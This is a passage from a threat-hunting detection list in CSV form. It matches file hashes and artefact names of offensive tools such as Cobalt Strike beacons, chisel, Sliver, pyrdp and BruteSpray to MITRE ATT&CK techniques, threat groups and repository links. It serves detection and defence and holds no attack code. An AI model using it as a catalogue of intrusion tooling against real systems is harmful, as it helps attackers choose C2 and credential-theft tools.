- T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*bdllspawn*",".{0,1000}bdllspawn.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*be03dfd28d37a8c444de321828edef417638c767a2a167133c5bf3a0b51ad60c*",".{0,1000}be03dfd28d37a8c444de321828edef417638c767a2a167133c5bf3a0b51ad60c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*be041565c155ce5a9129e2d79a2c8d18acf4143a7f3aa2237c15a15a89b6625e*",".{0,1000}be041565c155ce5a9129e2d79a2c8d18acf4143a7f3aa2237c15a15a89b6625e.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*be28f0c338095b629bfd563abd38c472c6b88618c3647a97c79f6c78cf620e15*",".{0,1000}be28f0c338095b629bfd563abd38c472c6b88618c3647a97c79f6c78cf620e15.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a 
honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*be3ae8e7cd4138850830f1d0b40cb409160a4449dda205a325c95de7bd2b76b0*",".{0,1000}be3ae8e7cd4138850830f1d0b40cb409160a4449dda205a325c95de7bd2b76b0.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*be5cfdd35404d90af8b73a2c53fcc2e2ca3aafb2af4f5484b8aea25f8cb60e73*",".{0,1000}be5cfdd35404d90af8b73a2c53fcc2e2ca3aafb2af4f5484b8aea25f8cb60e73.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*be6d43b84e5b69c33f6e155d0e7be48bb3da4a322d19feac4073ef14b845f9fa*",".{0,1000}be6d43b84e5b69c33f6e155d0e7be48bb3da4a322d19feac4073ef14b845f9fa.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*be9b23c9cf6731a8ae3d288871d277e64ca0caa5020433c4516b58e10f5e641f*",".{0,1000}be9b23c9cf6731a8ae3d288871d277e64ca0caa5020433c4516b58e10f5e641f.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*be9bee58f25350d6047bcb9de5b38957d7591c7b048ddd0a2e69162252516a54*",".{0,1000}be9bee58f25350d6047bcb9de5b38957d7591c7b048ddd0a2e69162252516a54.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*Beacon Payload Generator*",".{0,1000}Beacon\sPayload\sGenerator.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 
'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*beacon.*winsrv.dll*",".{0,1000}beacon\..{0,1000}winsrv\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - 
T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*beacon.CommandBuilder*",".{0,1000}beacon\.CommandBuilder.{0,1000}","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","467","73","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" "*beacon.CommandBuilder*",".{0,1000}beacon\.CommandBuilder.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation 
beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*beacon.dll*",".{0,1000}beacon\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon.elf*",".{0,1000}beacon\.elf.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*beacon.exe*",".{0,1000}beacon\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic 
Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon.exe*",".{0,1000}beacon\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon.nim*",".{0,1000}beacon\.nim.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF Files with Nim!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - 
T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/byt3bl33d3r/BOF-Nim","1","1","N/A","10","10","85","13","2022-07-10T22:12:10Z","2021-01-12T18:58:23Z" "*Beacon.Object.File.zip*",".{0,1000}Beacon\.Object\.File\.zip.{0,1000}","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","247","48","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" "*beacon.ps1*beacon.exe*",".{0,1000}beacon\.ps1.{0,1000}beacon\.exe.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","184","39","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "*beacon.x64*.dll*",".{0,1000}beacon\.x64.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" 
"*beacon.x64*.exe*",".{0,1000}beacon\.x64.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon.x64.dll*",".{0,1000}beacon\.x64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*beacon.x86*.dll*",".{0,1000}beacon\.x86.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon.x86*.exe*",".{0,1000}beacon\.x86.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat 